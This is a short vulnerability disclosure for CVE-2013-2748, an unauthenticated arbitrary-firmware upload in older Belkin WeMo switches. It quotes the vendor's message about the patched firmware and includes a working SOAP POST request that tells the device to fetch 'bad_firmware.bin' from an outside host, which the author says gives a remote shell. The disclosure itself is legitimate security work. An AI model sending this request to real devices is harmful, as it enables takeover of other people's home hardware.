# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability # Date: 4/3/13 # Exploit Author: Daniel Buentello # Vendor Homepage: http://www.belkin.com/us/wemo # Version: Any version prior to WeMo_US_2.00.2176.PVT # CVE : CVE-2013-2748 Hello Im independently working with Mitre and Belkin on this matter so please disregard my naiveness. Several months ago I discovered a vulnerablility on the Belkin WeMo light switch would allow arbitrary firmware to uploaded resulting in remote shell access. Here is a youtube link to a PoC video I made: https://www.youtube.com/watch?v=BcW2q0aHOFo I was finally able to reach Belkin and worked with them on patching the vulnerability. I recently heard back from them and here is the correspondence: Daniel, The FW for WeMo Switch and Sensor with the security fixes for some of the issues you notified us about have shipped. The updated FW version is WeMo_US_2.00.2176.PVT and WeMo_WW_2.00.2176.PVT (worldwide version). I didn't register for CVE's for the vulns you found, as the process wasn't clear for companies outside tier 1 (Microsoft, Oracle, Apple, Adobe) type companies. We are still working on a credit page for White Hat submissions and it will probably be a few months out. I reached out to Mitre and they assigned me a CVE and recommended I submit my code here. Here is the code which would allow someone to upload their own firmware: POST /upnp/control/firmwareupdate1 HTTP/1.1 SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware" Content-Length: Content-Type: text/xml; charset="utf-8" HOST: 10.0.1.8:49153 User-Agent: 07Jan20131 http://10.0.1.99/bad_firmware.bin Mitre needs the vulnerability documented on an external site in order to add the entry into the CVE database. If needed I can forward you the PGP signed message from them. If you need anything else feel free to ask. I have copies of all correspondence between Belkin., Mitre, and myself.